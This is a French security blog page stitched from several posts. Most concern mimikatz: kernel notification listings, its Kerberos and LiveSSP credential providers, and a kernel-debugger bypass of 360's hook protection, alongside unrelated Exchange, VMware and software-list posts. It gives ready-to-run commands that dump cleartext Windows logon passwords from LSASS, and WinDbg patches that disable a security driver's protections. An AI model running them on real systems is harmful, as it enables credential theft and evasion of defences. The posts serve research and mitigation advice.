Je participerai donc en tant qu’intervenant aux Positive Hack Days (PHDays) !

Au travers de mon exercice de prédilection, les slides (!), j’y exposerai mimikatz et en particulier les secrets de la librairie sekurlsa !

Les participants comprendront rapidement comment coder eux-même des modules de récupération de mots de passe Windows !

Attention : les participants du premier rang pourraient apercevoir des mots de passe en clair et avoir envie de coder des modules Meterpreter…

En dehors de ma présentation (le 31 Mai à 13 heures), j’assisterai à un maximum de concours et de conférences d’experts : http://phdays.com/program/.
Je vous encourage fortement à faire de même !

Si des francophones participent à cette conférence, n’hésitez pas à me contacter ; mon russe est trop ancien pour m’en sortir seul ;)

Prochainement documenté :

mimikatz # [...]
kListNotifyObjects

[...]
Process
 - Open        : FFFFF80002DA6960 [ntoskrnl.exe+3463520]
 - Close       : FFFFF80002D8B074 [ntoskrnl.exe+3350644]
 - Delete      : FFFFF80002D8A330 [ntoskrnl.exe+3347248]
 - Security    : FFFFF80002DBDCA0 [ntoskrnl.exe+3558560]
 * Callback 1  : FFFFF880033083C8 [klif.sys+218056] / FFFFF880033087D4 [klif.sys+219092]
 * Callback 1  : FFFFF88004212240 [SbieDrv.sys+74304] / FFFFF8800421742C [SbieDrv.sys+95276]

Token
 - Delete      : FFFFF80002D9BED0 [ntoskrnl.exe+3419856]
 - Security    : FFFFF80002DBDCA0 [ntoskrnl.exe+3558560]
 * Callback 1  : FFFFF88004212240 [SbieDrv.sys+74304] / FFFFF8800421742C [SbieDrv.sys+95276]

Mutant
 - Delete      : FFFFF80002AA27E4 [ntoskrnl.exe+301028]
 - Security    : FFFFF80002DBDCA0 [ntoskrnl.exe+3558560]
 * Callback 1  : FFFFF88004212240 [SbieDrv.sys+74304] / FFFFF8800421742C [SbieDrv.sys+95276]

File
 - Close       : FFFFF80002DDB580 [ntoskrnl.exe+3679616]
 - Delete      : FFFFF80002DCFEC0 [ntoskrnl.exe+3632832]
 - Parse       : FFFFF80002DF7AF0 [ntoskrnl.exe+3795696]
 - Security    : FFFFF80002DB3240 [ntoskrnl.exe+3514944]
 - QueryName   : FFFFF80002DB3514 [ntoskrnl.exe+3515668]
 * Callback 1  : FFFFF88004212240 [SbieDrv.sys+74304] / FFFFF8800421742C [SbieDrv.sys+95276]

Semaphore
 - Security    : FFFFF80002DBDCA0 [ntoskrnl.exe+3558560]
 * Callback 1  : FFFFF88004212240 [SbieDrv.sys+74304] / FFFFF8800421742C [SbieDrv.sys+95276]

Section
 - Delete      : FFFFF80002DEFFA0 [ntoskrnl.exe+3764128]
 - Security    : FFFFF80002DBDCA0 [ntoskrnl.exe+3558560]
 * Callback 1  : FFFFF88004212240 [SbieDrv.sys+74304] / FFFFF8800421742C [SbieDrv.sys+95276]

Thread
 - Open        : FFFFF80002DBF91C [ntoskrnl.exe+3565852]
 - Delete      : FFFFF80002DA9030 [ntoskrnl.exe+3473456]
 - Security    : FFFFF80002DBDCA0 [ntoskrnl.exe+3558560]
 * Callback 1  : FFFFF880033083C8 [klif.sys+218056] / FFFFF880033087D4 [klif.sys+219092]
 * Callback 1  : FFFFF88004212240 [SbieDrv.sys+74304] / FFFFF8800421742C [SbieDrv.sys+95276]

Event
 - Security    : FFFFF80002DBDCA0 [ntoskrnl.exe+3558560]
 * Callback 1  : FFFFF88004212240 [SbieDrv.sys+74304] / FFFFF8800421742C [SbieDrv.sys+95276]

ALPC Port
 - Open        : FFFFF80002DB1980 [ntoskrnl.exe+3508608]
 - Close       : FFFFF80002D76EA0 [ntoskrnl.exe+3268256]
 - Delete      : FFFFF80002D759D4 [ntoskrnl.exe+3262932]
 - Security    : FFFFF80002DBDCA0 [ntoskrnl.exe+3558560]
 * Callback 1  : FFFFF88004212240 [SbieDrv.sys+74304] / FFFFF8800421742C [SbieDrv.sys+95276]

L’activation de callbacks sur d’autre objets que les Process et Threads par Sandboxie en x64 est non supporté, mais cela reste quand même plus propre qu’en x86 où il remplace les procédures système par défaut de ces objets…

mimikatz # [...]
kListNotifyObjects

[...]
Process
 - Open        : 9269B070 [?]
 - Close       : 82ABFF55 [ntkrnlpa.exe+2559829]
 - Delete      : 82AC281C [ntkrnlpa.exe+2570268]
 - Security    : 82AB47D6 [ntkrnlpa.exe+2512854]
 * Callback 3  : 87CCACB2 [MpFilter.sys+97458] / 00000000 [?]

Token
 - Open        : 9269B020 [?]
 - Delete      : 82AA9120 [ntkrnlpa.exe+2466080]
 - Security    : 82AB47D6 [ntkrnlpa.exe+2512854]

Mutant
 - Open        : 9269B250 [?]
 - Delete      : 8290FFAB [ntkrnlpa.exe+790443]
 - Security    : 82AB47D6 [ntkrnlpa.exe+2512854]

File
 - Close       : 82A8188B [ntkrnlpa.exe+2304139]
 - Delete      : 82A809D3 [ntkrnlpa.exe+2300371]
 - Parse       : 9269B110 [?]
 - Security    : 82AB33BD [ntkrnlpa.exe+2507709]
 - QueryName   : 82ABF86E [ntkrnlpa.exe+2558062]

Semaphore
 - Open        : 9269B2A0 [?]
 - Security    : 82AB47D6 [ntkrnlpa.exe+2512854]

Section
 - Open        : 9269B2F0 [?]
 - Delete      : 82A71981 [ntkrnlpa.exe+2238849]
 - Security    : 82AB47D6 [ntkrnlpa.exe+2512854]

Thread
 - Open        : 9269B0C0 [?]
 - Delete      : 82AB89BB [ntkrnlpa.exe+2529723]
 - Security    : 82AB47D6 [ntkrnlpa.exe+2512854]

Event
 - Open        : 9269B200 [?]
 - Security    : 82AB47D6 [ntkrnlpa.exe+2512854]

ALPC Port
 - Open        : 9269B340 [?]
 - Close       : 82AAF0A3 [ntkrnlpa.exe+2490531]
 - Delete      : 82AAE8AC [ntkrnlpa.exe+2488492]
 - Security    : 82AB47D6 [ntkrnlpa.exe+2512854]

Device
 - Delete      : 82A0A338 [ntkrnlpa.exe+1815352]
 - Parse       : 9269B160 [?]
 - Security    : 82AB33BD [ntkrnlpa.exe+2507709]

Key
 - Close       : 82A9B2E6 [ntkrnlpa.exe+2409190]
 - Delete      : 82A8280B [ntkrnlpa.exe+2308107]
 - Parse       : 9269B1B0 [?]
 - Security    : 82A4431B [ntkrnlpa.exe+2052891]
 - QueryName   : 82A3AD00 [ntkrnlpa.exe+2014464]

Malgré le ? indiquant l’abscence de référence pour l’adresse 0x9269b070 en ligne 6, il s’agit bien de Sandboxie qui a placé un trampoline :

9269b070 8bc0            mov     eax,eax
9269b072 b88e07b191      mov     eax,offset SbieDrv+0x1378e (91b1078e)
9269b077 6a00            push    0
9269b079 6a00            push    0
9269b07b ffd0            call    eax

La version 6.2.8250.0 de WinDBG (débogueur de Microsoft) :

• x86_debuggers_and_tools-x86_en-us.msi
• x64_debuggers_and_tools-x64_en-us.msi

Parce que l’on a pas forcément envie de relancer plusieurs programmes d’installation pour juste ce composant…

Fournir aisément à autrui, par ses dires ou son comportement, l’occasion, la raison ou le simple prétexte de se faire blâmer, condamner ou punir.

Après le dernier billet sur « re – re – pass the pass » et…

• l’absence de réaction (oui, cela a été rapide :)
• une bonne question

… voici la suite !

Le provider

Cette fois ci nous avons le provider Kerberos ! Son fonctionnement par ticket n’impose normalement pas la réutilisation des mot de passe en clair.
Cf. une explication rapide de Microsoft : http://technet.microsoft.com/en-us/library/bb742516.aspx

Ce qui est dommage, c’est qu’une fois de plus des mots de passe sont encore conservés dans la mémoire du processus LSASS (en particulier à partir de NT 6).

Téléchargement et fonctionnement

Une mise à jour de mimikatz existe, mais elle n’est toujours pas disponible en téléchargement… (merci à nos amis éditeurs antivirus et Microsoft qui choisis de blacklister plutôt que d’améliorer ses processus)
Plus de release avant fin mai

A exécuter après avoir obtenu des droits administrateurs (ou system) :

privilege::debug
inject::service samss sekurlsa.dll
@getLogonPasswords full

La commande privilege::debug n’est pas obligatoire si vous êtes déjà system.
(plus d’information : http://blog.gentilkiwi.com/mimikatz/sekurlsa#getLogonPasswords et http://blog.gentilkiwi.com/mimikatz/sekurlsa/kerberos)

Nouvelles commandes (si besoin de séparation) :

@getMSV
@getTsPkg
@getWDigest
@getLiveSSP
@getKerberos

@getLogonPasswords utilise les providers disponibles et connus par mimikatz.

Améliorations

• ne garder que kerberos, msv1_0 et schannel dans la liste des providers autorisés (se référer au billet d’origine sur « pass the pass »)
  Utiliser Kerberos uniquement avec des Tokens et Cartes à puce (sans délégation)
  ils sont essentiels au fonctionnement des services Windows
• demander à Microsoft la validité de ce mode de fonctionnement avec un minimum de provider (je n’y crois vraiment plus…)

Après le dernier billet sur « re – pass the pass » et…

• les réactions positives de certains (Espagnols, Américains, Russes et Chinois)
• les réactions étranges d’autres : Microsoft & Amplia Security (ça faisait juste quasi un an que je l’avais présenté…)
• Windows 8 en approche

… voici la suite !

Le provider

Cette fois ci nous avons le provider LiveSSP qui, dans Windows 8, permet de se connecter avec son compte Microsoft Live (avec tout de même un petit cache dans la SAM locale en cas d’indisponibilité d’Internet ou des services Live).

Remarques :

• un compte Live est utilisé avec les providers :
  • msv1_0
  • tspkg
  • livessp
• un compte non Live est utilisé avec les providers :
  • msv1_0
  • wdigest
  • tspkg

Téléchargement et fonctionnement

Une mise à jour de mimikatz existe, mais elle n’est pas encore disponible en téléchargement… (merci à nos amis éditeurs antivirus et Microsoft qui choisis de blacklister plutôt que d’améliorer ses processus)
Plus de release avant fin mai

A exécuter après avoir obtenu des droits administrateurs (ou system) :

privilege::debug
inject::service samss sekurlsa.dll
@getLogonPasswords full

La commande privilege::debug n’est pas obligatoire si vous êtes déjà system.
(plus d’information : http://blog.gentilkiwi.com/mimikatz/sekurlsa#getLogonPasswords et http://blog.gentilkiwi.com/mimikatz/sekurlsa/livessp)

Nouvelles commandes (si besoin de séparation) :

@getMSV
@getTsPkg
@getWDigest
@getLiveSSP

@getLogonPasswords utilise les providers disponibles et connus par mimikatz.

Améliorations

• ne garder que kerberos, msv1_0 et schannel dans la liste des providers autorisés (se référer au billet d’origine sur « pass the pass »)
  ils sont essentiels au fonctionnement des services Windows
• demander à Microsoft la validité de ce mode de fonctionnement avec un minimum de provider (je n’y crois vraiment plus…)

Ce sacripant, même « désactivé » empêche certains accès à LSASS, et sans doute d’autres comportements déviants (en tout cas en x86).
Plutôt que de manipuler la SSDT, un pilote (hookport) place quelques trampolines dans la routine de répartition KiFastCallEntry, et s’assure du maintien de ces derniers :

kd> u nt!KiFastCallEntry+0xe1
nt!KiFastCallEntry+0xe1:
8283f241 8b1487          mov     edx,dword ptr [edi+eax*4]
8283f244 e98f7adc02      jmp     85606cd8 ; trampoline vers les fonctions "HIPS", remplaçant le code original
[…]
kd> u 85606cd8 l1
85606cd8 e92bd5f4fd      jmp     Hookport+0xb208 (83554208) ; second trampoline vers les fonctions "HIPS" de 360
kd> u Hookport+0xc401 ; portions du pilote réécrivant le trampoline
Hookport+0xc401:
83555401 ffa1886a5583    jmp     dword ptr Hookport+0xda88 (83556a88)[ecx]
83555407 c600e9          mov     byte ptr [eax],0E9h  ; instruction ‘jmp’
8355540a a1886a5583      mov     eax,dword ptr [Hookport+0xda88 (83556a88)]
8355540f 8b0d786a5583    mov     ecx,dword ptr [Hookport+0xda78 (83556a78)]
83555415 894801          mov     dword ptr [eax+1],ecx ; pointeur vers le premier trampoline

Ce correcteur n’est lui même pas très protégé :

kd> f 83555407 l3 90 ; nop nop nop ;)
Filled 0x3 bytes
kd> f 83555415 l3 90 ; nop nop nop ;)
Filled 0x3 bytes
kd> eb 8283f244 2b e1 c1 e9 02 ; instructions originales remplaçant le premier trampoline

A nous l’injection de DLL, ou autres joyeusetés !

Finalement le plus compliqué est d’installer le produit, en Mandarin…

• HackTool:Win32/Mikatz!dll
• HackTool:Win64/Mikatz!dll

Vu leurs dangerosité, j’aurais personnellement blacklisté tspkg.dll et wdigest.dll, mais il est à priori plus facile d’interdire un programme mettant en avant les faiblesses d’une architecture/implémentation que de corriger ou améliorer ses points faibles…

Pourquoi pas, mais des forks de cette librairie arriveront bien ici ou ailleurs, espérons que Microsoft ne considère pas cette action de facilité comme une solution…

c’est vrai, mimikatz ne fais pas tout.
(mais c’est bien essayé)

Prochainement documenté (même en x64 ;) :

mimikatz # [...]
kSSDT - KeServiceDescriptorTable        : FFFFF80002F00940
kSSDT - KeServiceDescriptorTable.TableSize      : 401
[   0]  : FFFFF800030DE880 [ntoskrnl.exe+4774016]
[   1]  : FFFFF80002FC4370 [ntoskrnl.exe+3617648]
[   2]  : FFFFF80002CC57A0 [ntoskrnl.exe+477088]
[...]
[ 399]  : FFFFF800030ED270 [ntoskrnl.exe+4833904]
[ 400]  : FFFFF80002CC1D50 [ntoskrnl.exe+462160]

mimikatz # [...]
kSSDT - KeServiceDescriptorTable        : FFFFF800011B4D80
kSSDT - KeServiceDescriptorTable.TableSize      : 296
[   0]  : FFFFF80001361FD0 [ntoskrnl.exe+3547088]
[   1]  : FFFFF8000127DF60 [ntoskrnl.exe+2613088]
[   2]  : FFFFF80001026B40 [ntoskrnl.exe+158528]
[...]
[ 294]  : FFFFF800013B38B0 [ntoskrnl.exe+3881136]
[ 295]  : FFFFF800013B3820 [ntoskrnl.exe+3880992]

mimikatz # [...]
kSSDT - KeServiceDescriptorTable        : 805530A0
kSSDT - KeServiceDescriptorTable.TableSize      : 284
[   0]  : 80599A74 [ntkrnlpa.exe+797300]
[   1]  : 805E7820 [ntkrnlpa.exe+1116192]
[   2]  : 805EB066 [ntkrnlpa.exe+1130598]
[...]
[ 282]  : 8060F4AC [ntkrnlpa.exe+1279148]
[ 283]  : 805C18FA [ntkrnlpa.exe+960762]

La taille du cache peut être diminuée via la configuration LDAP du moteur de base de donnée ESE.

• Chemin de l’objet : Configuration/Services/Microsoft Exchange/**organisation**/Administrative Groups/**groupe administratif**/Servers/**serveur ciblé**/Information Store
• Attribut : msExchESEParamCacheSizeMax (nombre de pages)
• Valeur : mémoire maximale / 8192 (taille d’une page sous Exchange 2007)

Exemple pour 384 Mo : (384 * 1024 * 1024) / 8192 = 49152

Ne pas oublier de redémarrer le service : « Microsoft Exchange – Banque d’informations » / msexchangeis

Source : http://technet.microsoft.com/library/bb691304.aspx

Prochainement documenté :

mimikatz # [...]
kListNotifyProcesses

[00] FFFFF80002C971E0 [ntoskrnl.exe+295392]
[01] FFFFF880017D91E0 [ksecdd.sys+74208]
[02] FFFFF8800126A3D0 [cng.sys+50128]
[03] FFFFF88001AE9950 [tcpip.sys+469328]
[04] FFFFF88000E8DBA0 [CI.dll+97184]
[05] FFFFF88004516D10 [MpFilter.sys+146704]
[06] FFFFF88006AE3954 [vmci.sys+35156]
[07] FFFFF8800681CD2C [peauth.sys+101676]
[08] FFFFF880071D2EF4 [PROCMON20.SYS+12020]

mimikatz # [...]
kListNotifyThreads

[00] FFFFF88004517584 [MpFilter.sys+148868]
[01] FFFFF880071D3094 [PROCMON20.SYS+12436]

mimikatz # [...]
kListNotifyImages

[00] FFFFF80002FE87C0 [ntoskrnl.exe+3774400]
[01] FFFFF880045172D4 [MpFilter.sys+148180]
[02] FFFFF880071D3338 [PROCMON20.SYS+13112]

mimikatz # [...]
kListNotifyRegistry

[00] FFFFF8800450E9B8 [MpFilter.sys+113080] - alt 425000 - cookie 0x1ccc334922c6342
[01] FFFFF880071D69D0 [PROCMON20.SYS+27088] - alt 425000 - cookie 0x1ccc334922c6343

mimikatz # [...]
kMiniFiltersList

PROCMON20
[...]
 Instance 1 @ \Device\HarddiskVolume2
  [0x16 CREATE                  ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x17 CREATE_NAMED_PIPE       ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x18 CLOSE                   ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x19 READ                    ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x1a WRITE                   ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x1b QUERY_INFORMATION       ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x1c SET_INFORMATION         ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x1d QUERY_EA                ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x1e SET_EA                  ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x1f FLUSH_BUFFERS           ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x20 QUERY_VOLUME_INFORMATION] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x21 SET_VOLUME_INFORMATION  ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x22 DIRECTORY_CONTROL       ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x23 FILE_SYSTEM_CONTROL     ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x24 DEVICE_CONTROL          ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x25 INTERNAL_DEVICE_CONTROL ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x26 SHUTDOWN                ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / 0000000000000000 [?]
  [0x27 LOCK_CONTROL            ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x28 CLEANUP                 ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x29 CREATE_MAILSLOT         ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x2a QUERY_SECURITY          ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x2b SET_SECURITY            ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x2f QUERY_QUOTA             ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x30 SET_QUOTA               ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
  [0x31 PNP                     ] FFFFF880071D49E8 [PROCMON20.SYS+18920] / FFFFF880071D4ED8 [PROCMON20.SYS+20184]
[...]
MpFilter
[...]
 Instance 1 @ \Device\HarddiskVolume2
  [0x16 CREATE                  ] FFFFF88004500E90 [MpFilter.sys+56976] / FFFFF88004503BBC [MpFilter.sys+68540]
  [0x1a WRITE                   ] FFFFF8800450B0D0 [MpFilter.sys+98512] / FFFFF880044F5778 [MpFilter.sys+10104]
  [0x1c SET_INFORMATION         ] FFFFF88004505144 [MpFilter.sys+74052] / FFFFF88004505428 [MpFilter.sys+74792]
  [0x23 FILE_SYSTEM_CONTROL     ] FFFFF88004514D88 [MpFilter.sys+138632] / FFFFF88004514F10 [MpFilter.sys+139024]
  [0x28 CLEANUP                 ] FFFFF880044FBD54 [MpFilter.sys+36180] / 0000000000000000 [?]
[...]
luafv
 Instance 0 @ \Device\HarddiskVolume2
  [0x16 CREATE                  ] FFFFF88000DE8DAC [luafv.sys+73132] / FFFFF88000DE9474 [luafv.sys+74868]
  [0x17 CREATE_NAMED_PIPE       ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x18 CLOSE                   ] FFFFF88000DE984C [luafv.sys+75852] / 0000000000000000 [?]
  [0x19 READ                    ] FFFFF88000DD833C [luafv.sys+4924] / FFFFF88000DD83CC [luafv.sys+5068]
  [0x1a WRITE                   ] FFFFF88000DD8414 [luafv.sys+5140] / FFFFF88000DD83CC [luafv.sys+5068]
  [0x1b QUERY_INFORMATION       ] FFFFF88000DE9E68 [luafv.sys+77416] / FFFFF88000DD8570 [luafv.sys+5488]
  [0x1c SET_INFORMATION         ] FFFFF88000DE9C84 [luafv.sys+76932] / FFFFF88000DD851C [luafv.sys+5404]
  [0x1d QUERY_EA                ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x1e SET_EA                  ] FFFFF88000DD8414 [luafv.sys+5140] / 0000000000000000 [?]
  [0x1f FLUSH_BUFFERS           ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x20 QUERY_VOLUME_INFORMATION] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x21 SET_VOLUME_INFORMATION  ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x22 DIRECTORY_CONTROL       ] FFFFF88000DE9FA4 [luafv.sys+77732] / FFFFF88000DD85D8 [luafv.sys+5592]
  [0x23 FILE_SYSTEM_CONTROL     ] FFFFF88000DEA0FC [luafv.sys+78076] / FFFFF88000DEA288 [luafv.sys+78472]
  [0x24 DEVICE_CONTROL          ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x25 INTERNAL_DEVICE_CONTROL ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x26 SHUTDOWN                ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x27 LOCK_CONTROL            ] FFFFF88000DEA2D4 [luafv.sys+78548] / 0000000000000000 [?]
  [0x28 CLEANUP                 ] FFFFF88000DE9A58 [luafv.sys+76376] / FFFFF88000DE9BAC [luafv.sys+76716]
  [0x29 CREATE_MAILSLOT         ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x2a QUERY_SECURITY          ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x2b SET_SECURITY            ] FFFFF88000DD8414 [luafv.sys+5140] / 0000000000000000 [?]
  [0x2c POWER                   ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x2d SYSTEM_CONTROL          ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x2e DEVICE_CHANGE           ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x2f QUERY_QUOTA             ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x30 SET_QUOTA               ] FFFFF88000DD82D8 [luafv.sys+4824] / 0000000000000000 [?]
  [0x31 PNP                     ] FFFFF88000DEA314 [luafv.sys+78612] / 0000000000000000 [?]
FileInfo
[...]
 Instance 1 @ \Device\HarddiskVolume2
  [0x16 CREATE                  ] FFFFF8800159C7B8 [fileinfo.sys+30648] / FFFFF8800159CA14 [fileinfo.sys+31252]
  [0x18 CLOSE                   ] FFFFF8800159CF5C [fileinfo.sys+32604] / FFFFF88001596980 [fileinfo.sys+6528]
  [0x19 READ                    ] FFFFF88001596078 [fileinfo.sys+4216] / FFFFF880015962F4 [fileinfo.sys+4852]
  [0x1a WRITE                   ] FFFFF88001596078 [fileinfo.sys+4216] / FFFFF880015962F4 [fileinfo.sys+4852]
  [0x1b QUERY_INFORMATION       ] FFFFF8800159689C [fileinfo.sys+6300] / FFFFF88001596980 [fileinfo.sys+6528]
  [0x1c SET_INFORMATION         ] FFFFF88001596404 [fileinfo.sys+5124] / FFFFF88001596578 [fileinfo.sys+5496]
  [0x1f FLUSH_BUFFERS           ] FFFFF8800159CFDC [fileinfo.sys+32732] / FFFFF88001596980 [fileinfo.sys+6528]
  [0x22 DIRECTORY_CONTROL       ] FFFFF8800159D020 [fileinfo.sys+32800] / FFFFF88001596980 [fileinfo.sys+6528]
  [0x23 FILE_SYSTEM_CONTROL     ] FFFFF8800159CCD4 [fileinfo.sys+31956] / FFFFF880015967D4 [fileinfo.sys+6100]
  [0x28 CLEANUP                 ] FFFFF8800159CE58 [fileinfo.sys+32344] / FFFFF8800159CE84 [fileinfo.sys+32388]
  [0x31 PNP                     ] FFFFF8800159D1C0 [fileinfo.sys+33216] / FFFFF8800159696C [fileinfo.sys+6508]
[...]

Cf: http://blog.gentilkiwi.com/retro-ingenierie/windbg-notifications-kernel

by Cathy Siegismund

Avec en bonus un classeur synthétisant les fonctionnalités et limites des outils connus :
https://docs.google.com/spreadsheet/ccc?key=0Ak-eXPencMnydGhwR1VvamhlNEljVHlJdVkxZ2RIaWc

Merci Bernardo pour ces recherches !

en plus mimikatz y est abordé ;)

• Base

  • Office – http://office.microsoft.com/fr-fr/
  • Firefox – http://www.mozilla.org/fr/firefox/
  • 7-zip – http://www.7-zip.org/
  • Sysinternals Suite – http://technet.microsoft.com/en-us/sysinternals/bb842062
  • Adobe Reader – http://www.adobe.com/fr/products/reader.html

• Développement

  • Visual Studio – http://msdn.microsoft.com/fr-fr/vstudio
  • Visual Studio Express – http://msdn.microsoft.com/fr-fr/express/
  • Windows Software Development Kit (SDK) – http://www.microsoft.com/download/en/details.aspx?id=8442
  • Windows Driver Kit (WDK) – http://msdn.microsoft.com/en-us/windows/hardware/gg487463
  • Oracle Java (JDK) – http://www.oracle.com/technetwork/java/javase/
  • NetBeans – http://netbeans.org/
  • Eclipse – http://www.eclipse.org/
  • Cygwin – http://www.cygwin.com/
  • MASM32 – http://www.masm32.com
  • Netwide Assembler (NASM) – http://www.nasm.us/
  • Qt – http://qt.nokia.com/
  • Strawberry Perl – http://strawberryperl.com/
  • PHP – http://windows.php.net/
  • Dependency Walker – http://www.dependencywalker.com/

• Dé-compilateur, débogueur, …

  • IDA – http://www.hex-rays.com/products/ida/
  • BinDiff – http://www.zynamics.com/bindiff.html
  • Hex-Rays Decompiler – http://www.hex-rays.com/products/decompiler/
  • WinDbg – http://msdn.microsoft.com/en-us/windows/hardware/gg463009
  • Java Decompiler (JD-GUI) – http://java.decompiler.free.fr/
  • ILSpy – http://wiki.sharpdevelop.net/ILSpy.ashx
  • JetBrains dotPeek – http://www.jetbrains.com/decompiler/
  • Immunity Debugger – http://immunityinc.com/products-immdbg.shtml
  • OllyDbg – http://www.ollydbg.de/
  • DebugView – http://technet.microsoft.com/en-us/sysinternals/bb896647
  • API Monitor – http://www.rohitab.com/apimonitor
  • Kernel Detective – http://www.at4re.com/download.php?view.2
  • Universal Extractor – http://legroom.net/software/uniextract

• Cryptographie

  • OpenSSL – http://www.openssl.org/
  • Keytool-iui – http://code.google.com/p/keytool-iui/
  • xca – http://sourceforge.net/projects/xca/
  • ASN.1 Editor – http://www.lipingshare.com/Asn1Editor/
  • keytool – inclus dans une JRE ou un JDK
  • jarsigner – inclus dans un JDK
  • certutil – inclus dans Windows NT >= 5.2, ou dans le adminpack.msi de 2003
  • certreq – inclus dans Windows NT >= 5.2, ou dans le adminpack.msi de 2003
  • SignTool – inclus dans les SDK, DDK ou Visual Studio Microsoft

• Editeurs

  • UltraEdit – http://www.ultraedit.com/products/ultraedit.html
  • UltraCompare – http://www.ultraedit.com/products/ultracompare.html
  • Notepad++ – http://notepad-plus-plus.org/

• Serveurs et bases de données

  • Apache HTTPd – http://httpd.apache.org/
  • Tomcat – http://tomcat.apache.org/
  • Oracle – http://www.oracle.com/technetwork/database/enterprise-edition/
  • MySQL – http://www.mysql.com/downloads/mysql/
  • SQuirreL SQL – http://www.squirrelsql.org/
  • EseDbViewer – http://www.woanware.co.uk/?page_id=89

• Virtualisation

  • VMware Workstation http://www.vmware.com/products/workstation/
  • VMware vSphere Hypervisor (ESXi) – http://www.vmware.com/products/vsphere-hypervisor/
  • Virtual PC avec XP – http://www.microsoft.com/windows/virtual-pc/

• Réseau

  • Remote Desktop Connection Manager (RDCMan) – http://www.microsoft.com/download/en/details.aspx?id=21101
  • Apache Directory Studio – http://directory.apache.org/studio/
  • PuTTY – http://www.chiark.greenend.org.uk/~sgtatham/putty/
  • FileZilla – http://filezilla-project.org/
  • uTorrent – http://www.utorrent.com/intl/fr/
  • Wireshark – http://www.wireshark.org/
  • TeamViewer – http://www.teamviewer.com/fr/

• Sécurité

  • Microsoft Security Essentials – http://windows.microsoft.com/fr-FR/windows/products/security-essentials (pour la maison)
  • TrueCrypt – http://www.truecrypt.org/
  • KeePass Password Safe – http://keepass.info/
  • Eraser – http://www.heidi.ie/eraser/

• Multimédia

  • Winamp – http://www.winamp.com/media-player/fr
  • K-Lite Codec Pack – http://www.codecguide.com/download_kl.htm
  • Adobe Creative Suite – http://www.adobe.com/fr/products/creativesuite/mastercollection.html
  • ICOFormat – http://www.telegraphics.com.au/sw/product/ICOFormat
  • ICOBundle – http://www.telegraphics.com.au/sw/product/ICOBundle

Cette fonctionnalité est intéressante lors d’usages de type serveur ou pour des tests. Mais la plupart du temps l’on voudra empêcher ces opérations à des utilisateurs tiers, ou éviter toutes mauvaise manipulation.

Cette modification peut être apporté facilement dans la configuration avancée de la machine virtuelle, ou directement dans le .vmx via la directive :

devices.hotplug = false

Source : http://kb.vmware.com/kb/1012225

Si vous avez généré votre biclé sur un système tiers plutôt que sur le serveur d’autorité Microsoft, il va falloir l’importer lors de l’installation ou du renouvellement…
Si certains messages d’erreurs lors de cet import peuvent être explicites, d’autres sont plus déconcertants :

Le certificat sélectionné n’a pas pu être utilisé

Ou lors de l’import dans la console de certificats :

